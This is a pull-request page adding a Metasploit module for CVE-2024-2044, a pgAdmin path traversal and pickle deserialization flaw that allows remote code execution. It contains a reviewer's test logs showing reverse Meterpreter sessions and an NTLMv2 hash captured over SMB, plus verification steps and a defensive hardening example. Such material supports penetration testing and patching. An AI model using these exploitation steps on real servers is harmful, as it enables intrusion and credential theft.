Add exploit for CVE-2024-2044 (pgAdmin <= 8.3 RCE) #19026
Great module. Thanks for supporting both exploit techniques! A couple minor suggestions. Testing was as expected:
Unix Authenticated
msf6 exploit(multi/http/pgadmin_session_deserialization) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
[*] Successfully authenticated to pgAdmin
[*] Serialized payload uploaded to: /var/lib/pgadmin/storage/metasploit_gmail.com/amet.ods
[*] Triggering deserialization for path: ../storage/metasploit_gmail.com/amet.ods
[*] Sending stage (24772 bytes) to 172.16.199.131
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:57444) at 2024-04-16 10:17:38 -0700
meterpreter > getuid
Server username: pgadmin
meterpreter > sysinfo
Computer : 765d0319a1ea
OS : Linux 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct 6 10:23:26 UTC 2
Architecture : x64
Meterpreter : python/linux
meterpreter >
Windows Authenticated
msf6 exploit(multi/http/pgadmin_session_deserialization) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
[*] Successfully authenticated to pgAdmin
[*] Serialized payload uploaded to: C:\Users\msfuser\AppData\Roaming\pgAdmin\storage\metasploit_gmail.com/omnis.odt
[*] Triggering deserialization for path: ../storage/metasploit_gmail.com/omnis.odt
[*] Sending stage (24772 bytes) to 172.16.199.135
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.135:51125) at 2024-04-16 09:23:54 -0700
meterpreter > getuid
Server username: CLIENT\msfuser
meterpreter > sysinfo
Computer : client
OS : Windows 10 (Build 19045)
Architecture : x64
System Language : en_US
Meterpreter : python/windows
meterpreter >
Windows Unauthenticated
msf6 exploit(multi/http/pgadmin_session_deserialization) > run
[*] Started reverse TCP handler on 172.16.199.1:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
[*] Server is running. Listening on 172.16.199.1:445
[*] The SMB service has been started.
[*] Triggering deserialization for path: \\172.16.199.1\fnhlW\ZPPl
[SMB] NTLMv2-SSP Client : 172.16.199.135
[SMB] NTLMv2-SSP Username : CLIENT\msfuser
[SMB] NTLMv2-SSP Hash : msfuser::CLIENT:b7f1ecd023526627:ef207a721fee35176c118c141c94edb6:
[*] Sending stage (24772 bytes) to 172.16.199.135
[*] Meterpreter session 2 opened (172.16.199.1:5555 -> 172.16.199.135:49805) at 2024-04-16 10:00:06 -0700
[*] Server stopped.
meterpreter > getuid
Server username: CLIENT\msfuser
meterpreter > sysinfo
Computer : client
OS : Windows 10 (Build 19045)
Architecture : x64
System Language : en_US
Meterpreter : python/windows
meterpreter >
Release Notes: This adds an exploit for pgAdmin <= 8.3 which is a path traversal vulnerability in the session management that allows a Python pickle object to be loaded and deserialized. This also adds a new Python deserialization gadget chain to execute the code in a new thread so the target application doesn't block the HTTP request.
This adds an exploit for pgAdmin <= 8.3 which is a path traversal vulnerability in the session management that allows a Python pickle object to be loaded and deserialized. This also adds a new Python deserialization gadget chain to execute the code in a new thread so the target application doesn't block the HTTP request. I've added the source code for both the new one and the original as well to help future travelers tweak it as necessary.
Important notes from the exploit description:
This requires the changes from:
Verification
- use exploit/multi/http/pgadmin_session_deserialization
- Set RHOST, PAYLOAD, and optionally the USERNAME and PASSWORD options
- run
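Added example, not code from this PR or from pgAdmin: a hypothetical file-backed session store hardened against the two defects the description names, a traversal through the session path and an unrestricted pickle load. The names `SessionStore`, `safe_loads` and `demo`, and the constructed inputs in `demo`, are assumptions.

```python
import io
import os
import pickle
import tempfile

class RestrictedUnpickler(pickle.Unpickler):
    # Session data is plain dicts/strings: no class or function should ever
    # need to be resolved, so refuse every global lookup outright.
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

class SessionStore:
    # Hypothetical file-backed session store (not pgAdmin's own code).
    def __init__(self, root):
        self.root = os.path.realpath(root)

    def _path(self, session_id):
        # Allow-list the id first: no separators or dots ever reach join().
        if not (session_id.isascii() and session_id.isalnum()):
            raise ValueError("invalid session id")
        path = os.path.realpath(os.path.join(self.root, session_id))
        if os.path.commonpath([self.root, path]) != self.root:  # belt and braces
            raise ValueError("session path escapes the store")
        return path

    def save(self, session_id, data):
        with open(self._path(session_id), "wb") as f:
            pickle.dump(data, f)

    def load(self, session_id):
        with open(self._path(session_id), "rb") as f:
            return safe_loads(f.read())

def demo():
    # Constructed scenario: benign round-trip, then two refused inputs.
    store = SessionStore(tempfile.mkdtemp())
    store.save("abc123", {"user": "alice"})
    results = {"benign": store.load("abc123")}
    try:
        store.load("../storage/evil")  # traversal-style id
    except ValueError:
        results["traversal_blocked"] = True
    try:  # pickle.dumps(len) references builtins.len, which needs find_class
        safe_loads(pickle.dumps(len))
    except pickle.UnpicklingError:
        results["global_blocked"] = True
    return results
```

The allow-list is what actually stops the traversal; the realpath check only catches ids the allow-list would have to be loosened to admit.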